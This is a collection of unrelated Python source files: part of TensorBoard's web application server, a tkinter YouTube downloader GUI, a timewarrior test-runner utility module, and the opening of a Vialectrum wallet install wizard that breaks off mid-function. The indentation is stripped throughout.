).format(name=name, script_content=script_content)
return http_util.Respond(
request, html, "text/html", csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
eid = plugin_util.experiment_id(request.environ)
plugins_with_data = frozenset(
self._data_provider.list_plugins(eid) or frozenset()
if self._data_provider is not None
else frozenset()
)
plugins_to_skip = self._experimental_plugins - frozenset(
request.args.getlist(EXPERIMENTAL_PLUGINS_QUERY_PARAM)
)
for plugin in self._plugins:
if plugin.plugin_name in plugins_to_skip:
continue
if (
type(plugin) is core_plugin.CorePlugin
): # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
is_active = bool(
frozenset(plugin.data_plugin_names()) & plugins_with_data
)
if not is_active:
try:
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
"Plugin listing: is_active() for %s took %0.3f seconds",
plugin.plugin_name,
elapsed,
)
except Exception:
is_active = False
logger.error(
"Plugin listing: is_active() for %s failed (marking inactive)",
plugin.plugin_name,
exc_info=True,
)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
"disable_reload": plugin_metadata.disable_reload,
"enabled": is_active,
# loading_mechanism set below
"remove_dom": plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata["tab_name"] = plugin_metadata.tab_name
else:
output_metadata["tab_name"] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
is_ng_component = plugin_metadata.is_ng_component
if is_ng_component:
if element_name is not None:
raise ValueError(
"Plugin %r declared as both Angular built-in and legacy"
% plugin.plugin_name
)
if es_module_handler is not None:
raise ValueError(
"Plugin %r declared as both Angular built-in and iframed"
% plugin.plugin_name
)
loading_mechanism = {
"type": "NG_COMPONENT",
}
elif element_name is not None and es_module_handler is not None:
logger.error(
"Plugin %r declared as both legacy and iframed; skipping",
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
"type": "CUSTOM_ELEMENT",
"element_name": element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
"type": "IFRAME",
"module_path": "".join(
[
request.script_root,
DATA_PREFIX,
PLUGIN_PREFIX,
"/",
plugin.plugin_name,
es_module_handler,
]
),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
"type": "NONE",
}
output_metadata["loading_mechanism"] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, "application/json")
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](
environ, start_response
)
logger.warn("path %s not found, sending 404", clean_path)
return http_util.Respond(
request, "Not found", "text/plain", code=404
)(environ, start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]*://.*")
for specification in logdir_spec.split(","):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon. If the spec looks like
# [a-zA-z]:\foo then we assume its a Windows path and not a single letter
# group
if (
uri_pattern.match(specification) is None
and ":" in specification
and specification[0] != "/"
and not os.path.splitdrive(specification)[0]
):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(":")
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
def start_reloading_multiplexer(
multiplexer, path_to_run, load_interval, reload_task
):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError("load_interval is negative: %d" % load_interval)
def _reload():
while True:
start = time.time()
logger.info("TensorBoard reload process beginning")
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info(
"TensorBoard reload process: Reload the whole Multiplexer"
)
multiplexer.Reload()
duration = time.time() - start
logger.info(
"TensorBoard done reloading. Load took %0.3f secs", duration
)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == "process":
logger.info("Launching reload in a child process")
import multiprocessing
process = multiprocessing.Process(target=_reload, name="Reloader")
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ("thread", "auto"):
logger.info("Launching reload in a daemon thread")
thread = threading.Thread(target=_reload, name="Reloader")
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == "blocking":
if load_interval != 0:
raise ValueError(
"blocking reload only allowed with load_interval=0"
)
_reload()
else:
raise ValueError("unrecognized reload_task: %s" % reload_task)
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != "/" and path.endswith("/"):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
:type plugin_spec:
Type[base_plugin.TBPlugin] | Type[base_plugin.TBLoader] |
base_plugin.TBLoader
:rtype: base_plugin.TBLoader
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
|
gui.py
|
# from functools import partial
from pathlib import Path
from importlib import resources
from threading import Event, Thread
import tkinter as tk
from tkinter import filedialog, ttk
import requests
from PIL import Image, ImageTk
from .about_window import AboutWindow
from utils.custom_paths import resource_path
from utils.custom_threads import KThread
from utils.youtube_downloader import YouTubeDownloader
class MainApp(ttk.Frame):
def __init__(self, master):
super().__init__(master)
self.master = master
self.grid(column=0, row=0, sticky=(tk.N, tk.W, tk.E, tk.S))
self.yt = YouTubeDownloader()
self.download_option = tk.IntVar()
self.output_dir = tk.StringVar()
self.output_file = tk.StringVar()
self.output_extension = tk.StringVar()
self.itag = tk.IntVar()
self.status_text = tk.StringVar()
self.download_running = tk.BooleanVar()
self.yt_url = tk.StringVar()
self.yt_title = tk.StringVar()
self.yt_thumbnail = None
self.yt_length = tk.StringVar()
self.yt_author = tk.StringVar()
self.yt_file_size = tk.DoubleVar()
self.yt_current_size = tk.DoubleVar()
self.thread_flag = Event()
self.customize_window()
self.create_styles()
self.create_widgets()
self.create_window_menu()
self.create_contextual_menu()
self.create_bindings()
self.additional_styling()
def customize_window(self):
self.master.resizable(tk.FALSE, tk.FALSE)
# self.master.iconbitmap('assets/favicon.ico')
# with resources.path('assets', 'icon.png') as icon_path:
# self._icon = tk.PhotoImage(file=icon_path)
icon_path = resource_path('assets', 'icon.png')
self._icon = tk.PhotoImage(file=icon_path)
self.master.iconphoto(True, self._icon)
self.master.title('YouTube Downloader')
self.master.columnconfigure(0, weight=1)
self.master.rowconfigure(0, weight=1)
def create_styles(self):
self.s = ttk.Style()
self.s.configure('Start.TButton', font='-weight bold', foreground='green', padding=10)
def toggle_check(self, *args):
if self.yt_url.get():
self.check_button['state'] = 'focus'
self.filemenu.entryconfigure('Check URL', state=tk.NORMAL)
else:
self.check_button['state'] = 'disabled'
self.filemenu.entryconfigure('Check URL', state=tk.DISABLED)
def toggle_download(self, *args):
self.streams_tree.delete(*self.streams_tree.get_children())
self.download_button['state'] = 'disabled'
self.filemenu.entryconfigure('Download', state=tk.DISABLED)
if self.yt_title.get():
self.status_text.set('Check URL again.')
def itag_select(self, e):
idx = e.widget.selection()[0]
# streams_tree.item(idx)['text']
self.itag.set(int(self.streams_tree.set(idx, column='itag')))
self.output_extension.set(self.streams_tree.set(idx, column='type'))
self.yt_file_size.set(float(self.streams_tree.set(idx, column='size')))
self.status_text.set(f'itag selected: {self.itag.get()}.')
self.download_button['state'] = 'focus'
self.filemenu.entryconfigure('Download', state=tk.NORMAL)
def check(self):
self.check_button.state(['disabled'])
self.filemenu.entryconfigure('Check URL', state=tk.DISABLED)
self.status_text.set('Checking provided url...')
try:
self.yt.check(self.yt_url.get(), self.download_option.get())
self.yt_title.set(self.yt.title)
self.output_file.set(self.yt.title)
self.yt_thumbnail = self.yt.thumbnail_url
self.yt_length.set(self.yt.length)
self.yt_author.set(self.yt.author)
# 'image'
image_obj = ImageTk.PhotoImage(Image.open(requests.get(self.yt_thumbnail, stream=True).raw))
self.image = ttk.Label(self.fileframe, image=image_obj)
# garbage collector prevention
self.image.image = image_obj
self.image.grid(column=1, row=3, sticky=(tk.W), pady=5, padx=5)
self.streams_tree.delete(*self.streams_tree.get_children())
for item in self.yt.streams_list:
self.streams_tree.insert('', 'end', values=item)
self.check_button['state'] = 'focus'
self.status_text.set('URL checked.')
except Exception as err:
self.status_text.set(f'Something went wrong with {err.__doc__}.')
def select_dir(self):
self.dirname = filedialog.askdirectory(title='Select destination folder', initialdir=self.output_dir.get())
if self.dirname:
self.output_dir.set(self.dirname)
self.status_text.set('Folder selected.')
def paste_url(self):
try:
self.yt_url.set(str(self.master.clipboard_get()).strip())
except tk.TclError:
pass
# stream, chunk, file_handle, bytes_remaining
def show_progress_bar(self, stream, chunk, bytes_remaining):
mbytes_downloaded = float(f'{(stream.filesize - bytes_remaining) / 1024**2:.2f}')
self.yt_current_size.set(mbytes_downloaded)
self.p_label['text'] = f'{self.yt_current_size.get()} / {self.yt_file_size.get()} MB'
def on_complete(self, stream, file_handle):
self.itag.set(None)
self.yt_file_size.set(None)
if not self.yt.file_complete():
self.status_text.set('Converting to mp3...')
self.yt.file_converter(file_handle)
# self.yt.convert()
# self.convert_thread = KThread(target=self.yt.convert, daemon=True)
# self.convert_thread.start()
self.status_text.set('Done.')
def download(self):
self.download_button['state'] = 'disabled'
self.cancel_button['state'] = 'focus'
self.filemenu.entryconfigure('Download', state=tk.DISABLED)
self.download_running.set(True)
self.yt_current_size.set(0.0)
self.progress_bar.configure(maximum=self.yt_file_size.get())
self.status_text.set('Downloading...')
self.yt.register_on_progress_callback(self.show_progress_bar)
self.yt.register_on_complete_callback(self.on_complete)
# self.yt.download(self.itag.get(), self.output_dir.get(), self.output_file.get())
self.download_thread = KThread(target=self.yt.download, daemon=True, args=(self.itag.get(),
self.output_dir.get(),
self.output_file.get(),
self.output_extension.get(),))
self.download_thread.start()
def cancel(self):
self.download_thread.kill()
self.download_button['state'] = 'focus'
self.cancel_button['state'] = 'disabled'
self.filemenu.entryconfigure('Download', state=tk.NORMAL)
self.status_text.set('Download canceled.')
def create_widgets(self):
self.download_option.set(1)
self.options_frame = ttk.Labelframe(self, text='Download options')
self.options_frame.grid(column=0, row=0, columnspan=1, sticky=(tk.W, tk.E), pady=5, padx=15)
self.rb1 = ttk.Radiobutton(self.options_frame, text='Single video', variable=self.download_option, value=1)
self.rb2 = ttk.Radiobutton(self.options_frame, text='Audio as "mp3"', variable=self.download_option, value=2)
self.rb1.grid(column=0, row=0, sticky=tk.W)
self.rb2.grid(column=0, row=1, sticky=tk.W)
self.download_option.trace_add('write', self.toggle_download)
# 'download button'
# self.download_button = ttk.Button(self, text='Download', state='disabled', style='Start.TButton',
# command=lambda: Thread(target=self.download).start())
self.download_button = ttk.Button(self, text='Download', state='disabled', style='Start.TButton',
command=self.download)
self.download_button.grid(column=1, row=0)
# 'cancel button'
self.cancel_button = ttk.Button(self, text='Cancel', state='disabled', command=self.cancel)
self.cancel_button.grid(column=2, row=0)
# 'url'
self.url_label = ttk.Label(self, text='YouTube URL: ')
self.url_label.grid(column=0, row=2, sticky=tk.E)
self.url_entry = ttk.Entry(self, width=50, textvariable=self.yt_url)
self.url_entry.grid(column=1, row=2, sticky=(tk.W, tk.E))
self.yt_url.trace_add('write', self.toggle_check)
# check_button = ttk.Button(mainframe, text='Check', state='disabled', command=partial(check, yt_url.get()))
self.check_button = ttk.Button(self, text='Check', state='disabled',
command=lambda: KThread(target=self.check, daemon=True).start())
self.check_button.grid(column=2, row=2)
# 'output dir'
self.dir_label = ttk.Label(self, text='Output dir: ')
self.dir_label.grid(column=0, row=3, sticky=tk.E)
self.output_dir.set(str(Path.home()))
self.dir_entry = ttk.Entry(self, width=50, textvariable=self.output_dir)
self.dir_entry.grid(column=1, row=3, sticky=(tk.W, tk.E))
self.dir_button = ttk.Button(self, text='Browse ...', command=self.select_dir)
self.dir_button.grid(column=2, row=3)
# 'file name'
self.file_label = ttk.Label(self, text='File name: ')
self.file_label.grid(column=0, row=4, sticky=tk.E)
self.file_entry = ttk.Entry(self, width=50, textvariable=self.output_file)
self.file_entry.grid(column=1, row=4, sticky=(tk.W, tk.E))
# 'streams tree'
self.tree_abel = ttk.Label(self, text='Quality options: ')
self.tree_abel.grid(column=0, row=8, sticky=(tk.N, tk.E))
self.treeframe = ttk.Frame(self)
self.treeframe.grid(column=1, row=8, columnspan=2, sticky=(tk.N, tk.W, tk.E, tk.S), pady=5)
tree_columns = ['itag', 'type', 'quality', 'size']
self.streams_tree = ttk.Treeview(self.treeframe, columns=tree_columns, height=5, padding=5, selectmode='browse')
self.streams_tree.column('#0', stretch=tk.NO, width=0, minwidth=0)
self.streams_tree.column('itag', width=50, minwidth=40, anchor='e')
self.streams_tree.column('type', width=100, minwidth=60, anchor='e')
self.streams_tree.column('quality', width=100, minwidth=60, anchor='e')
self.streams_tree.column('size', width=150, minwidth=100, anchor='e')
self.streams_tree.heading('itag', text='itag', anchor='e')
self.streams_tree.heading('type', text='File type', anchor='e')
self.streams_tree.heading('quality', text='Quality', anchor='e')
self.streams_tree.heading('size', text='Size [MB]', anchor='e')
self.streams_tree.grid(column=0, row=0, sticky=(tk.N, tk.W, tk.E, tk.S))
self.s = ttk.Scrollbar(self.treeframe, orient=tk.VERTICAL, command=self.streams_tree.yview)
self.s.grid(column=1, row=0, sticky=(tk.N, tk.S))
self.streams_tree['yscrollcommand'] = self.s.set
self.treeframe.grid_columnconfigure(0, weight=1)
self.treeframe.grid_rowconfigure(0, weight=1)
self.streams_tree.bind('<<TreeviewSelect>>', self.itag_select)
# 'File info'
self.fileframe = ttk.Labelframe(self, text='File info', width=280)
self.fileframe.grid(column=3, row=1, rowspan=9, columnspan=2, sticky=(tk.N, tk.W, tk.E, tk.S), pady=5, padx=15)
self.fileframe.grid_propagate(False)
ttk.Label(self.fileframe, text='Title: ').grid(column=0, row=0, sticky=(tk.E), pady=5)
ttk.Label(self.fileframe, textvariable=self.yt_title, wraplength=180).grid(column=1, row=0, sticky=(tk.W),
pady=5, padx=5)
ttk.Label(self.fileframe, text='Author: ').grid(column=0, row=1, sticky=(tk.E), pady=5)
ttk.Label(self.fileframe, textvariable=self.yt_author).grid(column=1, row=1, sticky=(tk.W), pady=5, padx=5)
ttk.Label(self.fileframe, text='Length: ').grid(column=0, row=2, sticky=(tk.E), pady=5)
ttk.Label(self.fileframe, textvariable=self.yt_length).grid(column=1, row=2, sticky=(tk.W), pady=5, padx=5)
ttk.Label(self.fileframe, text='Thumbnail: ').grid(column=0, row=3, sticky=(tk.N, tk.E), pady=5)
# 'separator'
self.s = ttk.Separator(self, orient=tk.HORIZONTAL)
self.s.grid(column=0, row=9, columnspan=3, sticky=(tk.E, tk.W), pady=30, padx=15)
# 'progressbar'
self.progress_bar = ttk.Progressbar(self, orient=tk.HORIZONTAL, variable=self.yt_current_size,
mode='determinate')
self.progress_bar.grid(column=0, row=10, columnspan=3, pady=5, padx=15, sticky=(tk.N, tk.W, tk.E, tk.S))
self.p_label = ttk.Label(self, text='0 MB')
self.p_label.grid(column=3, row=10, pady=5, padx=15, sticky=(tk.N, tk.W, tk.E, tk.S))
# 'status bar'
ttk.Label(self, textvariable=self.status_text, anchor=(tk.W), relief=tk.SUNKEN).grid(column=0, row=11,
columnspan=5,
sticky=(tk.W, tk.E))
def create_window_menu(self):
self.menubar = tk.Menu(self.master, tearoff=0)
self.filemenu = tk.Menu(self.menubar, tearoff=0)
self.filemenu.add_command(label='Output dir...', command=self.select_dir)
self.filemenu.add_command(label='Check URL', state=tk.DISABLED, command=self.check)
self.filemenu.add_command(label='Download', state=tk.DISABLED, command=self.download)
self.filemenu.add_separator()
self.filemenu.add_command(label='Exit', command=self.master.destroy)
self.menubar.add_cascade(label='File', menu=self.filemenu)
self.editmenu = tk.Menu(self.menubar, tearoff=0)
self.editmenu.add_command(label='Paste URL', command=self.paste_url)
self.menubar.add_cascade(label='Edit', menu=self.editmenu)
self.helpmenu = tk.Menu(self.menubar, tearoff=0)
self.helpmenu.add_command(label='About', command=lambda: AboutWindow(self.master))
self.menubar.add_cascade(label='Help', menu=self.helpmenu)
self.master.config(menu=self.menubar)
def create_contextual_menu(self):
self.contmenu = tk.Menu(self.master, tearoff=0)
self.contmenu.add_command(label='Paste URL', command=self.paste_url)
if (self.master.tk.call('tk', 'windowingsystem') == 'aqua'):
self.master.bind('<2>', lambda e: self.contmenu.post(e.x_root, e.y_root))
self.master.bind('<Control-1>', lambda e: self.contmenu.post(e.x_root, e.y_root))
else:
self.master.bind('<3>', lambda e: self.contmenu.post(e.x_root, e.y_root))
def create_bindings(self):
self.master.bind('<Return>', self.download)
def additional_styling(self):
for child in self.winfo_children():
child.grid_configure(padx=5, pady=5)
self.url_entry.focus()
|
utils.py
|
from __future__ import division
import atexit
import functools
import os
import signal
import sys
import tempfile
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
from time import sleep
try:
import simplejson as json
except ImportError:
import json
from .exceptions import CommandError, TimeoutWaitingFor
ON_POSIX = 'posix' in sys.builtin_module_names
# Directory relative to basetest module location
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
# Location of binary files (usually the src/ folder)
BIN_PREFIX = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "..", "src")
)
# Default location of test certificates
DEFAULT_CERT_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_certs")
)
# Default location of test extensions
DEFAULT_EXTENSION_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_extensions")
)
# Environment flags to control skipping of timew tests
TIMEW_SKIP = os.environ.get("TIMEW_SKIP", False)
# Environment flags to control use of PATH or in-tree binaries
TIMEW_USE_PATH = os.environ.get("TIMEW_USE_PATH", False)
UUID_REGEXP = ("[0-9A-Fa-f]{8}-" + ("[0-9A-Fa-f]{4}-" * 3) + "[0-9A-Fa-f]{12}")
def timew_binary_location(cmd="timew"):
""" ../src/ is used by default."""
return os.path.join(BIN_PREFIX, cmd)
def binary_location(cmd, USE_PATH=False):
""" ../src/ is used by default."""
return os.path.join(BIN_PREFIX, cmd)
def wait_condition(cond, timeout=1, sleeptime=.01):
"""Wait for condition to return anything other than None"""
# NOTE Increasing sleeptime can dramatically increase testsuite runtime
# It also reduces CPU load significantly
if timeout is None:
timeout = 1
if timeout < sleeptime:
print("Warning, timeout cannot be smaller than", sleeptime)
timeout = sleeptime
# Max number of attempts until giving up
tries = int(timeout / sleeptime)
for i in range(tries):
val = cond()
if val is not None:
break
sleep(sleeptime)
return val
def wait_process(pid, timeout=None):
"""Wait for process to finish"""
def process():
try:
os.kill(pid, 0)
except OSError:
# Process is dead
return True
else:
# Process is still ticking
return None
return wait_condition(process, timeout)
def _queue_output(arguments, pidq, outputq):
"""Read/Write output/input of given process.
This function is meant to be executed in a thread as it may block
"""
kwargs = arguments["process"]
input = arguments["input"]
try:
proc = Popen(**kwargs)
except OSError as e:
# pid None is read by the main thread as a crash of the process
pidq.put(None)
outputq.put((
"",
("Unexpected exception caught during execution: '{0}' . ".format(e)),
255)) # false exitcode
return
# Put the PID in the queue for main process to know.
pidq.put(proc.pid)
# Send input and wait for finish
out, err = proc.communicate(input)
if sys.version_info > (3,):
out, err = out.decode('utf-8'), err.decode('utf-8')
# Give the output back to the caller
outputq.put((out, err, proc.returncode))
def _retrieve_output(thread, timeout, queue, thread_error):
"""Fetch output from binary subprocess queues"""
# Try to join the thread on failure abort
thread.join(timeout)
if thread.is_alive():
# Join should have killed the thread. This is unexpected
raise TimeoutWaitingFor(thread_error + ". Unexpected error")
# Thread died so we should have output
try:
# data = (stdout, stderr, exitcode)
data = queue.get(timeout=timeout)
except Empty:
data = TimeoutWaitingFor("streams from program")
return data
def _get_output(arguments, timeout=None):
"""Collect output from the subprocess without blocking the main process if
subprocess hangs.
"""
# NOTE Increase this value if tests fail with None being received as
# stdout/stderr instead of the expected content
output_timeout = 0.1 # seconds
pidq = Queue()
outputq = Queue()
t = Thread(target=_queue_output, args=(arguments, pidq, outputq))
t.daemon = True
t.start()
try:
pid = pidq.get(timeout=timeout)
except Empty:
pid = None
# Process crashed or timed out for some reason
if pid is None:
return _retrieve_output(t, output_timeout, outputq, "Program to start")
# Wait for process to finish (normal execution)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq, "Program thread to join")
# If we reach this point we assume the process got stuck or timed out
for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):
# Start with lower signals and escalate if process ignores them
try:
os.kill(pid, signal.SIGABRT)
except OSError as e:
# 3 means the process finished/died between last check and now
if e.errno != 3:
raise
# Wait for process to finish (should die/exit after signal)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq, "Program to die")
# This should never happen but in case something goes really bad
raise OSError("Program stopped responding and couldn't be killed")
def run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE,
merge_streams=False, env=os.environ, timeout=None):
"""Run a subprocess and wait for it to finish"""
if input is None:
stdin = None
else:
stdin = PIPE
if merge_streams:
stderr = STDOUT
else:
stderr = PIPE
arguments = {
"process": {
"args": cmd,
"stdin": stdin,
"stdout": stdout,
"stderr": stderr,
"bufsize": -1,
"close_fds": ON_POSIX,
"env": env,
},
"input": input,
}
out, err, exit = _get_output(arguments, timeout)
if merge_streams:
if exit != 0:
raise CommandError(cmd, exit, out)
else:
return exit, out
else:
if exit != 0:
raise CommandError(cmd, exit, out, err)
else:
return exit, out, err
def run_cmd_wait_nofail(*args, **kwargs):
"""Same as run_cmd_wait but silence the exception if it happens"""
try:
return run_cmd_wait(*args, **kwargs)
except CommandError as e:
return e.code, e.out, e.err
def memoize(obj):
"""Keep an in-memory cache of function results given it's inputs"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
try:
from shutil import which
which = memoize(which)
except ImportError:
# NOTE: This is shutil.which backported from python-3.3.3
@memoize
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode) and
not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly
# rather than referring to PATH directories. This includes checking
# relative to the current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if os.curdir not in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path
# extensions. This will allow us to short circuit when given
# "python.exe". If it does match, only test that one, otherwise we
# have to try others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
def parse_datafile(file):
"""Parse .data files, treating files as JSON"""
data = []
with open(file) as fh:
for line in fh:
line = line.rstrip("\n")
# Turn [] strings into {} to be treated properly as JSON hashes
if line.startswith('[') and line.endswith(']'):
line = '{' + line[1:-1] + '}'
if line.startswith("{"):
data.append(json.loads(line))
else:
data.append(line)
return data
def mkstemp(data):
"""Create a temporary file that is removed at process exit"""
def rmtemp(name):
try:
os.remove(name)
except OSError:
pass
f = tempfile.NamedTemporaryFile(delete=False)
f.write(data)
f.close()
# Ensure removal at end of python session
atexit.register(rmtemp, f.name)
return f.name
def mkstemp_exec(data):
"""Create a temporary executable file that is removed at process exit"""
name = mkstemp(data)
os.chmod(name, 0o755)
return name
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from vialectrum import Wallet, WalletStorage
from vialectrum.util import UserCancelled, InvalidPassword
from vialectrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from vialectrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Vialectrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Viacoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
